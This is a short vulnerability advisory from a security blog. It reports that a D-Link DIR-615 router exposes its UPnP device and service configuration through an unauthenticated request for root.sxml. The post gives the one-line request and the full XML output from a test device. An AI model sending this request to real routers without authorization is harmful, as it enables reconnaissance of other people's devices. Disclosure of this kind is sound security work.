Information Security Expert Blog

Dr. Ali Jahangiri

Device Information

D-link DIR-615 Device Information and Configuration Vulnerability

By

Overview:
General device configuration and information such as UDN, services, service ID, Control URL and other detailed information from a D-Link DIR-615 Wireless N 300 router can be accessed by fetching root.sxml using a web browser.

Description:
Attacker can gain remote access to the D-Link DIR-615 Wireless N 300 router, general device information and configuration by fetching root.sxml file.

Exploit Syntax: http://deviceIP/root.sxml

Exploit Output for device with IP 192.168.150.1:

−<root>
−<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>http://192.168.150.1</URLBase>
−<device>
−<deviceType>
urn:schemas-upnp-org:device:InternetGatewayDevice:1
</deviceType>
<presentationURL>/</presentationURL>
<friendlyName>Wireless N Router</friendlyName>
<manufacturer>D-Link Systems</manufacturer>
<manufacturerURL>http://www.dlink.com</manufacturerURL>
<modelDescription>Wireless N Router</modelDescription>
<modelName>Wireless N Router</modelName>
<modelNumber>DIR-615</modelNumber>
<modelURL>http://www.dlink.com</modelURL>
<serialNumber>none</serialNumber>
<UDN>uuid:280BA93F-BC7B-336E-8F78-733C78667090</UDN>
<UPC>00000-00001</UPC>
−<serviceList>
−<service>
<serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1</serviceType>
<serviceId>urn:upnp-org:serviceId:L3Forwarding1</serviceId>
<controlURL>http://192.168.150.1:4444/l3fw</controlURL>
<eventSubURL>http://192.168.150.1:9393/l3fw</eventSubURL>
<SCPDURL>http://192.168.150.1/l3fw.xml</SCPDURL>
</service>
</serviceList>
−<deviceList>
−<device>
<deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
<friendlyName>Wireless N Router</friendlyName>
<manufacturer>D-Link Systems</manufacturer>
<manufacturerURL>http://www.dlink.com</manufacturerURL>
<modelDescription>Wireless N Router</modelDescription>
<modelName>Wireless N Router</modelName>
<modelNumber>DIR-615</modelNumber>
<modelURL>http://www.dlink.com</modelURL>
<serialNumber>none</serialNumber>
<UDN>uuid:616CA787-7B12-39B7-836B-9DDF50280572</UDN>
<UPC>00000-00001</UPC>
−<serviceList>
−<service>
−<serviceType>
urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1
</serviceType>
<serviceId>urn:upnp-org:serviceId:WANCommonIFC1</serviceId>
<controlURL>http://192.168.150.1:4444/wcommifc</controlURL>
<eventSubURL>http://192.168.150.1:9393/wcommifc</eventSubURL>
<SCPDURL>http://192.168.150.1/WANCommonIFC1.xml</SCPDURL>
</service>
</serviceList>
−<deviceList>
−<device>
<deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
<friendlyName>Wireless N Router</friendlyName>
<manufacturer>D-Link Systems</manufacturer>
<manufacturerURL>http://www.dlink.com</manufacturerURL>
<modelDescription>Wireless N Router</modelDescription>
<modelName>Wireless N Router</modelName>
<modelNumber>DIR-615</modelNumber>
<modelURL>http://www.dlink.com</modelURL>
<serialNumber>none</serialNumber>
<UDN>uuid:C730E975-C618-3CC8-A0D8-92913DD5EC5E</UDN>
<UPC>00000-00001</UPC>
−<serviceList>
−<service>
<serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>
<controlURL>http://192.168.150.1:4444/wipconn</controlURL>
<eventSubURL>http://192.168.150.1:9393/wipconn</eventSubURL>
<SCPDURL>http://192.168.150.1/WANIPConn1.xml</SCPDURL>
</service>
</serviceList>
</device>
</deviceList>
</device>
−<device>
<deviceType>urn:schemas-wifialliance-org:device:WFADevice:1</deviceType>
<presentationURL>/</presentationURL>
<friendlyName>WFADevice</friendlyName>
<manufacturer>D-Link Systems</manufacturer>
<manufacturerURL>http://www.dlink.com</manufacturerURL>
<modelDescription>Wireless N Router</modelDescription>
<modelName>Wireless N Router</modelName>
<modelNumber>DIR-615</modelNumber>
<modelURL>http://www.dlink.com</modelURL>
<serialNumber>none</serialNumber>
<UDN>uuid:5B0240B4-5042-3757-A05A-51DBD8DF789E</UDN>
<UPC>00000-00001</UPC>
−<serviceList>
−<service>
−<serviceType>
urn:schemas-wifialliance-org:service:WFAWLANConfig:1
</serviceType>
<serviceId>urn:wifialliance-org:serviceId:WFAWLANConfig1</serviceId>
<controlURL>http://192.168.150.1:8832/wfawc</controlURL>
<eventSubURL>http://192.168.150.1:8456/wfawc</eventSubURL>
<SCPDURL>http://192.168.150.1/WFAwc.xml</SCPDURL>
</service>
</serviceList>
</device>
</deviceList>
</device>
</root>

Impact:
Important device information and general configuration will be revealed without proper authorization.

Solution:
I am currently unaware of a solution to this problem.

Vendor Information:
http://www.dlink.com/products/?pid=565

Product Details:
D-Link Wireless access point
Product Page DIR-615
Hardware Version :B2
Firmware Version: 2.25

CERT(R) Coordination Center Tracking Code: VU#944927 Date: 01/10/2010